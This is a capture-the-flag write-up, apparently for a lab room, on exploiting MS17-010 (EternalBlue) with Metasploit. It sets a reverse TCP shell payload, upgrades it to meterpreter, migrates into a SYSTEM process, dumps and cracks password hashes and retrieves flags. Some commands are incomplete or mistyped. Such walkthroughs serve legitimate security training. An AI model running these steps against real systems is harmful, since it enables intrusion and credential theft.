# Write-up ### Task 1: RECON *How many ports are opejn with a port number under 1000?* We start by running an **nmap** scan on ports 1-999: ```bash sudo nmap -sCV -Pn -T5 -p1-9999 ```

Answer: 3 *What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)* We continue by running another nmap: ```bash sudo nmap -sCV --script vuln ```

Answer: ms17-010 *** ### Task 2: GAIN ACCESS *Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/.......)* We open metasploit ```bash msfconsole -q search ms17-010 ```

Answer: exploit/windows/smb/ms17\_010\_eternalblue *Show options and set the one required value. What is the name of this value? (All caps for submission)* To get the answer we need to select the previous exploit and watch the options ```bash use exploit/windows/smb/ms17_010_eternalblue show options ``` Answer: RHOSTS *Usually it would be fine to run this exploit as is; however, for the sake of learning, you should do one more thing before exploiting the target. Enter the following command and press enter:* *set payload windows/x64/shell/reverse\_tcp* To perform this we need to do the following on our msfconsole: ```bash set RHOSTS set payload windows/x64/shell/reverse_tcp set LHOST run ```

*** ### Task 3: ESCALATE *If you haven't already, background the previously gained shell (CTRL+Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (exact path, similar to the exploit we previously selected)* In order to convert a shell to meterpreter shell in metasploit we should do: ```bash Ctrl + Z y sessions search shell_to_meterpreter use 0 ``` Answer: post/multi/manage/shell\_to\_meterpreter *Select this (use MODULE\_PATH). Show options, what option are we required to change?* We should do: ```bash show options set SESSION run ``` After a while we can see another session created.

Answer: SESSION *Once the meterpreter shell conversion completes, select that session for use.* ``` sessions 2 ``` *List all of the processes running via the 'ps' command. Just because we are system doesn't mean our process is. Find a process towards the bottom of this list that is running at NT AUTHORITY\SYSTEM and write down the process id (far left column)* For this step and the next one, we should execute: ``` ps // Write cmd.exe PID migrate ``` *** ### Task 4: CRACKING *Within our elevated meterpreter shell, run the command 'hashdump'. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?* Now we are going to use hashdump:

Answer: Jon *Copy this password hash to a file and research how to crack it. What is the cracked password?* For this we should use crackstation

Answer: alwfna22 *** ### Task 5: FIND FLAGS! *Flag1? This flag can be found at the system root.* System root is in / so: ```bash cd / ls cat flag1.txt ```

*\*Errata: Windows really doesn't like the location of this flag and can occasionally delete it. It may be necessary in some cases to terminate/restart the machine and rerun the exploit to find this flag. This relatively rare, however, it can happen.* So, we need to execute: ```bash cd Windows\\System32\\config\\ ls cat flag2.txt ```

*Flag3? This flag can be found in an excellent location to loot. After all, Administrators usually have pretty interesting things saved.* After a while searching, we's founded the flag3 in C:\Users\Jon\Documents so: ``` cd C:\Users\Jon\Documents ls cat flag3.txt ```

***